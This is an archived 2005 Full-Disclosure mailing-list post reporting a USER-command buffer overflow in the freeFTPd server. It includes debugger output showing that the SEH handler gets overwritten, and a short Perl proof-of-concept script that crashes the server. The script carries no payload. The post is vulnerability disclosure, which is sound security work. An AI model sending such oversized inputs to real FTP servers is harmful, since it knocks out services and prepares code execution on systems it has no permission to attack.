| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <981281b10511160156x26da1beco2bdd1547b809abe5@mail.gmail.com>
Date: Wed Nov 16 10:39:57 2005
From: barbsie at gmail.com (barabas mutsonline)
Subject: freeftpd USER bufferoverflow
Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
well, eip doesnt get overwritten, but SEH does:
0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler
EIP 47464544
Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:
#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005
use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;
my $ftp = Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug => 1);
$ftp->login("$user","whatevah");
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051116/c0501cfb/attachment.html
Powered by blists - more mailing lists